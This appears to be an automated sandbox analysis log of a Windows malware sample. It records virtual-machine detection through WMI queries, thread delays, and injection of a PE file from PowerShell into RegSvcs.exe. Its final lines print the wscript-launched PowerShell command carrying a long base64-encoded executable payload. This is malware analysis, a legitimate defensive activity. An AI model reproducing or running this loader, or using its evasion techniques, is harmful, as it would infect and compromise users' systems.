        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4332Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3736Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3392Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99859Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99743Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99638Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99516Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99359Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99244Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99124Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98998Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98874Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98761Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98656Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98546Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98422Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wscript.exe, 00000000.00000003.302307322.000001D52CD5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}x
        Source: RegSvcs.exe, 00000003.00000002.831596259.0000000005FD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllowerManagementCapabilities
        Source: powershell.exe, 00000001.00000003.310430015.0000028B4A593000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Writes to foreign memory regions
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 972008Jump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedalaz+mmaaaaaaaaaaoaaaielavaaacyaaaagaaaaaaaaskqaaaagaaaayaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaacgaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaagbeaabpaaaaagaaacgdaaaaaaaaaaaaaaaaaaaaaaaaaiaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaucqaaaagaaaajgaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaayaaaaaqaaaaoaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaaiaaaaacaaaalaaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaacuraaaaaaaaegaaaacaauaxcgaaoqaaaadaaaaaaaaakhdaac4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab4ckaeaaaoqhgioawaaciqmcwqaaaqaaqaabhmfaaakgaiaaarzbgaacoadaaaecwcaaaqabaaabcoufgeaaarvcaaacioufgiaaarvcqaacioufgmaaarvcgaacioufgqaaarvcwaacirwfguaaaqukboaaaosaisgfguaaaqqcgeaahdqbqaaaigpaaakbxsaaapzhaaacoafaaaek9oafgyaaaqqhgkabgaabcpwcwwaaayohqaacnqgaaacgacaaaqqhgiohgaacioafgcaaaqqgignaaagkh4ckbiaaaoqabmwbabaaaaaaqaaexihaabwcxyrarzfagaaaaiaaaayaaaakx8xdad+iaaacgixkbsaaaysbxckfyvbkw0if9ymgcvscbsx3xykbiobmaoabqqaaaiaabfylqaacaioiqaacgwwkwewrqmaaaacaaaadqaaabgaaaaririd/hupaaacfyviegt+fq4aaaiyk9csaxz9gaaabbkrzbid0a8aaaiodwaacigiaaakuh0naaaeaygjaaaklq0icqeaahadkcqaaaomagh+jqaacn4laaakfhp+jqaachqsaxiekbaaaaytbnmmaaakegqfpcgnaaakewuwkwewrrqaaaafaaaafqaaacqaaaazaaaadaaaamaaaadtaaaa8gaaaaibaabqaqaazqeaag8baaciaqaanaeaalabaadiaqaa3geaaa0caaasagaaxqiaadhxagaabbefhztwkccaaaotbhcrliczaaaajqkaaaetbxgrhxehfiacaaeanhk4ep///ygoaaakgjmweqr7cgaabbehkbeaaaythhmmaaakeheeewoaaaqrbygsaaaglqzzjgaacnorbx8plbmigjg3////eqr7cqaabbeihtyscrosasgvaaaglqzzjgaacnorbhejmxyrbhsjaaaeeqkofwaabiwgcyyaaap6bbefh1dwkccaaaotchs46/7//wqrbr9u1ignaaakewsconj+//8rbhsjaaaeeqyrciaamaaah0aogaaabhmnhti5/v//bs0leq0tirctdb44qf7//xeeewkaaaqweqogadaaab9akbgaaaytdrenlqzzjgaacnorbhsjaaaeeq0eeqssasgwaaaglqzzjgaacnorbsd4aaaa1hmohwk4w/7//wqrbrzwkckaaaox2hmrhwo4rv7//xyteh8lodz+//84nwaaaaqrdh8m1ignaaakexmfddgj/v//bbeohxdwkccaaaotfb8noa/+//8eeq4ffnyojwaachmvhw44+/3//xeulesrfbfaf9angwaaarmwhw844/3//wqrfrewfhewjmkokgaach8qom39//8rbhsjaaaeeq0re9yrfhewjmksasgwaaaglqzzjgaacnordh8o1hmohxe4nv3//xesf9ytehesere+wp///xenkcsaaaotdx8soh/9//8rbhsjaaaeeqge1hepghibkbyaaaytbnmmaaakegqrbr8o1ignaaakexafezho/f//eqwsbbegew0rbx8seq0renaehxq4nf3//ygoaaakgjmweqr7cgaabbehkbmaaaythhmmaaakeheeewoaaaqrbyguaaaglqzzjgaacnorbhskaaaekbkaaayvmwzzjgaacnrescgsaaakfisbfkudaaaaagaaabqaaaakaaaakyorbhslaaaehcgtaaakexcxk9srfywherdvlgaachykgcvlkc8aaaozk8peahckbioaaabbhaaaaaaaafsaaabeawaauqmaaegaaaayaaabhgioegaaciobmaqa7qaaaamaabfzmaaaciuomqaacm8yaaakaigzaaakkdqaaapypqaachkxaabwbzuaaapytqaachldaabwbzuaaapyxwaachltaabwbzuaaapy1waachljaabwbzuaaapy5waachl5aabwbzuaaapy/qaachipaqbwbzuaaapyeweachilaqbwbzuaaapyk
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedalaz+mmaaaaaaaaaaoaaaielavaaacyaaaagaaaaaaaaskqaaaagaaaayaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaacgaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaagbeaabpaaaaagaaacgdaaaaaaaaaaaaaaaaaaaaaaaaaiaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaucqaaaagaaaajgaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaayaaaaaqaaaaoaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaaiaaaaacaaaalaaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaacuraaaaaaaaegaaaacaauaxcgaaoqaaaadaaaaaaaaakhdaac4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab4ckaeaaaoqhgioawaaciqmcwqaaaqaaqaabhmfaaakgaiaaarzbgaacoadaaaecwcaaaqabaaabcoufgeaaarvcaaacioufgiaaarvcqaacioufgmaaarvcgaacioufgqaaarvcwaacirwfguaaaqukboaaaosaisgfguaaaqqcgeaahdqbqaaaigpaaakbxsaaapzhaaacoafaaaek9oafgyaaaqqhgkabgaabcpwcwwaaayohqaacnqgaaacgacaaaqqhgiohgaacioafgcaaaqqgignaaagkh4ckbiaaaoqabmwbabaaaaaaqaaexihaabwcxyrarzfagaaaaiaaaayaaaakx8xdad+iaaacgixkbsaaaysbxckfyvbkw0if9ymgcvscbsx3xykbiobmaoabqqaaaiaabfylqaacaioiqaacgwwkwewrqmaaaacaaaadqaaabgaaaaririd/hupaaacfyviegt+fq4aaaiyk9csaxz9gaaabbkrzbid0a8aaaiodwaacigiaaakuh0naaaeaygjaaaklq0icqeaahadkcqaaaomagh+jqaacn4laaakfhp+jqaachqsaxiekbaaaaytbnmmaaakegqfpcgnaaakewuwkwewrrqaaaafaaaafqaaacqaaaazaaaadaaaamaaaadtaaaa8gaaaaibaabqaqaazqeaag8baaciaqaanaeaalabaadiaqaa3geaaa0caaasagaaxqiaadhxagaabbefhztwkccaaaotbhcrliczaaaajqkaaaetbxgrhxehfiacaaeanhk4ep///ygoaaakgjmweqr7cgaabbehkbeaaaythhmmaaakeheeewoaaaqrbygsaaaglqzzjgaacnorbx8plbmigjg3////eqr7cqaabbeihtyscrosasgvaaaglqzzjgaacnorbhejmxyrbhsjaaaeeqkofwaabiwgcyyaaap6bbefh1dwkccaaaotchs46/7//wqrbr9u1ignaaakewsconj+//8rbhsjaaaeeqyrciaamaaah0aogaaabhmnhti5/v//bs0leq0tirctdb44qf7//xeeewkaaaqweqogadaaab9akbgaaaytdrenlqzzjgaacnorbhsjaaaeeq0eeqssasgwaaaglqzzjgaacnorbsd4aaaa1hmohwk4w/7//wqrbrzwkckaaaox2hmrhwo4rv7//xyteh8lodz+//84nwaaaaqrdh8m1ignaaakexmfddgj/v//bbeohxdwkccaaaotfb8noa/+//8eeq4ffnyojwaachmvhw44+/3//xeulesrfbfaf9angwaaarmwhw844/3//wqrfrewfhewjmkokgaach8qom39//8rbhsjaaaeeq0re9yrfhewjmksasgwaaaglqzzjgaacnordh8o1hmohxe4nv3//xesf9ytehesere+wp///xenkcsaaaotdx8soh/9//8rbhsjaaaeeqge1hepghibkbyaaaytbnmmaaakegqrbr8o1ignaaakexafezho/f//eqwsbbegew0rbx8seq0renaehxq4nf3//ygoaaakgjmweqr7cgaabbehkbmaaaythhmmaaakeheeewoaaaqrbyguaaaglqzzjgaacnorbhskaaaekbkaaayvmwzzjgaacnrescgsaaakfisbfkudaaaaagaaabqaaaakaaaakyorbhslaaaehcgtaaakexcxk9srfywherdvlgaachykgcvlkc8aaaozk8peahckbioaaabbhaaaaaaaafsaaabeawaauqmaaegaaaayaaabhgioegaaciobmaqa7qaaaamaabfzmaaaciuomqaacm8yaaakaigzaaakkdqaaapypqaachkxaabwbzuaaapytqaachldaabwbzuaaapyxwaachltaabwbzuaaapy1waachljaabwbzuaaapy5waachl5aabwbzuaaapy/qaachipaqbwbzuaaapyeweachilaqbwbzuaaapykJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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